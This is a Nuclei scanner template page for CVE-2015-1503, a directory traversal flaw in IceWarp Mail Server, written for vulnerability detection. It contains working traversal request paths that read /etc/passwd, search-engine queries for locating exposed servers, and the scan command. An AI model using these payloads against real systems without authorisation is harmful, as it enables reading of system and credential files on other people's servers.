IceWarp Mail Server <11.1.1 - Directory Traversal
ID: CVE-2015-1503
Severity: high
Author: 0x_Akoko
Tags: cve2015,cve,lfi,mail,packetstorm,icewarp
Description
Section titled “Description”IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2015-1503
info: name: IceWarp Mail Server <11.1.1 - Directory Traversal author: 0x_Akoko severity: high description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability. impact: | An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation. remediation: | Upgrade IceWarp Mail Server to version 11.1.1 or above to mitigate the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html - http://www.icewarp.com - https://nvd.nist.gov/vuln/detail/CVE-2015-1503 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1503 cwe-id: CWE-22 epss-score: 0.90421 epss-percentile: 0.98743 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: icewarp product: mail_server shodan-query: - title:"icewarp" - http.title:"icewarp server administration" - http.title:"icewarp" - cpe:"cpe:2.3:a:icewarp:mail_server" fofa-query: - title="icewarp server administration" - title="icewarp" google-query: - intitle:"icewarp server administration" - intitle:"icewarp" - powered by icewarp 10.4.4 tags: cve2015,cve,lfi,mail,packetstorm,icewarp
http: - method: GET path: - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd" - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4a0a00473045022100831948a8646b80c5f4548395e8db09443f032bef8d9fc28644a6e90468aad77502206d151db0b4db061c6f260e4aa860bc67e22c849c7ed271c7dc92eb7808c0a53f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-1503.yaml"